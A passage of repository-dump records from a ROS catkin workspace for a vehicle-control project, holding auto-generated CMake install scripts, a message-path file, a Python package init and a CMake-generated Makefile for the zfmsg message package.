"content_id": "3c4517ec871eea64f6fa747e2e90aecc80a56706",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 193,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 4,
"path": "/build/zf_msgs/catkin_generated/installspace/zf_msgs-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.installspace.in\n\n_prepend_path(\"${zf_msgs_DIR}/..\" \"msg\" zf_msgs_MSG_INCLUDE_DIRS UNIQUE)\nset(zf_msgs_MSG_DEPENDENCIES std_msgs;geometry_msgs)\n"
},
{
"alpha_fraction": 0.7468085289001465,
"alphanum_fraction": 0.765744686126709,
"avg_line_length": 50.63736343383789,
"blob_id": "29df3d791b0d98e812bce6b3b7bf35a1b0333efb",
"content_id": "ba9f630435653741ad12d7fc51755978b6f23fd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 4700,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 91,
"path": "/build/zfmsg/cmake_install.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# Install script for directory: /home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg\n\n# Set the install prefix\nif(NOT DEFINED CMAKE_INSTALL_PREFIX)\n set(CMAKE_INSTALL_PREFIX \"/home/zf/xuechong_ws/zhuifengShow0919/install\")\nendif()\nstring(REGEX REPLACE \"/$\" \"\" CMAKE_INSTALL_PREFIX \"${CMAKE_INSTALL_PREFIX}\")\n\n# Set the install configuration name.\nif(NOT DEFINED CMAKE_INSTALL_CONFIG_NAME)\n if(BUILD_TYPE)\n string(REGEX REPLACE \"^[^A-Za-z0-9_]+\" \"\"\n CMAKE_INSTALL_CONFIG_NAME \"${BUILD_TYPE}\")\n else()\n set(CMAKE_INSTALL_CONFIG_NAME \"\")\n endif()\n message(STATUS \"Install configuration: \\\"${CMAKE_INSTALL_CONFIG_NAME}\\\"\")\nendif()\n\n# Set the component getting installed.\nif(NOT CMAKE_INSTALL_COMPONENT)\n if(COMPONENT)\n message(STATUS \"Install component: \\\"${COMPONENT}\\\"\")\n set(CMAKE_INSTALL_COMPONENT \"${COMPONENT}\")\n else()\n set(CMAKE_INSTALL_COMPONENT)\n endif()\nendif()\n\n# Install shared libraries without execute permission?\nif(NOT DEFINED CMAKE_INSTALL_SO_NO_EXE)\n set(CMAKE_INSTALL_SO_NO_EXE \"1\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/msg\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg-msg-paths.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/include\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/include/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/roseus/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/common-lisp/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/gennodejs/ros\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/gennodejs/ros/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n execute_process(COMMAND \"/usr/bin/python\" -m compileall \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/python2.7/dist-packages\" TYPE DIRECTORY FILES \"/home/zf/xuechong_ws/zhuifengShow0919/devel/lib/python2.7/dist-packages/zfmsg\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/lib/pkgconfig\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg.pc\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsg-msg-extras.cmake\")\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg/cmake\" TYPE FILE FILES\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsgConfig.cmake\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/catkin_generated/installspace/zfmsgConfig-version.cmake\"\n )\nendif()\n\nif(NOT CMAKE_INSTALL_COMPONENT OR \"${CMAKE_INSTALL_COMPONENT}\" STREQUAL \"Unspecified\")\n file(INSTALL DESTINATION \"${CMAKE_INSTALL_PREFIX}/share/zfmsg\" TYPE FILE FILES \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/package.xml\")\nendif()\n\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.7254902124404907,
"avg_line_length": 24.5,
"blob_id": "c507288e59c635589f125f8f8fd880a791670cb9",
"content_id": "3acbf84a9f1f4db286710920d6ad3e014c61256b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/devel/lib/python2.7/dist-packages/zf_msgs/msg/__init__.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "from ._pos320 import *\nfrom ._pose2dArray import *\n"
},
{
"alpha_fraction": 0.7552165985107422,
"alphanum_fraction": 0.7660833597183228,
"avg_line_length": 41.15053939819336,
"blob_id": "f9e4eb2fac985f37f9f628db4390adf5e2229d40",
"content_id": "ce1d451a406b02a24319720da47851f957a0fdb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 19601,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 465,
"path": "/build/zfmsg/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/zfmsg/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n\n# Convenience name for target.\nzfmsg_gennodejs: zfmsg/CMakeFiles/zfmsg_gennodejs.dir/rule\n\n.PHONY : zfmsg_gennodejs\n\n# fast build rule for target.\nzfmsg_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_gennodejs.dir/build.make zfmsg/CMakeFiles/zfmsg_gennodejs.dir/build\n.PHONY : zfmsg_gennodejs/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n\n# Convenience name for target.\nzfmsg_genpy: zfmsg/CMakeFiles/zfmsg_genpy.dir/rule\n\n.PHONY : zfmsg_genpy\n\n# fast build rule for target.\nzfmsg_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_genpy.dir/build.make zfmsg/CMakeFiles/zfmsg_genpy.dir/build\n.PHONY : zfmsg_genpy/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_cpp: zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/rule\n\n.PHONY : zfmsg_generate_messages_cpp\n\n# fast build rule for target.\nzfmsg_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_cpp.dir/build\n.PHONY : zfmsg_generate_messages_cpp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_MotionCmd: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_MotionCmd\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_MotionCmd/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_MotionCmd.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_MotionCmd/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages: zfmsg/CMakeFiles/zfmsg_generate_messages.dir/rule\n\n.PHONY : zfmsg_generate_messages\n\n# fast build rule for target.\nzfmsg_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages.dir/build\n.PHONY : zfmsg_generate_messages/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_BreakStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_BreakStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_BreakStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_BreakStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_BreakStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_eus: zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/rule\n\n.PHONY : zfmsg_generate_messages_eus\n\n# fast build rule for target.\nzfmsg_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/build\n.PHONY : zfmsg_generate_messages_eus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_SteerStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_SteerStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_SteerStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_SteerStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_SteerStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n\n# Convenience name for target.\nzfmsg_gencpp: zfmsg/CMakeFiles/zfmsg_gencpp.dir/rule\n\n.PHONY : zfmsg_gencpp\n\n# fast build rule for target.\nzfmsg_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_gencpp.dir/build.make zfmsg/CMakeFiles/zfmsg_gencpp.dir/build\n.PHONY : zfmsg_gencpp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_CanInfo: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfo/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_py: zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/rule\n\n.PHONY : zfmsg_generate_messages_py\n\n# fast build rule for target.\nzfmsg_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build\n.PHONY : zfmsg_generate_messages_py/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n.PHONY : zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n\n# Convenience name for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus: zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/rule\n\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n\n# Convenience name for target.\nzfmsg_geneus: zfmsg/CMakeFiles/zfmsg_geneus.dir/rule\n\n.PHONY : zfmsg_geneus\n\n# fast build rule for target.\nzfmsg_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_geneus.dir/build.make zfmsg/CMakeFiles/zfmsg_geneus.dir/build\n.PHONY : zfmsg_geneus/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n\n# Convenience name for target.\nzfmsg_genlisp: zfmsg/CMakeFiles/zfmsg_genlisp.dir/rule\n\n.PHONY : zfmsg_genlisp\n\n# fast build rule for target.\nzfmsg_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_genlisp.dir/build.make zfmsg/CMakeFiles/zfmsg_genlisp.dir/build\n.PHONY : zfmsg_genlisp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_lisp: zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/rule\n\n.PHONY : zfmsg_generate_messages_lisp\n\n# fast build rule for target.\nzfmsg_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build\n.PHONY : zfmsg_generate_messages_lisp/fast\n\n# Convenience name for target.\nzfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n.PHONY : zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nzfmsg_generate_messages_nodejs: zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/rule\n\n.PHONY : zfmsg_generate_messages_nodejs\n\n# fast build rule for target.\nzfmsg_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build\n.PHONY : zfmsg_generate_messages_nodejs/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this 